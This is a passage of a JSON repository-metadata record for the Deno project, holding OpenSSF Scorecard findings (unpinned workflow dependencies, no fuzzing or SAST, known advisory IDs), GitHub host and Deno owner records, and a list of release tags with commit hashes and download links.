https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_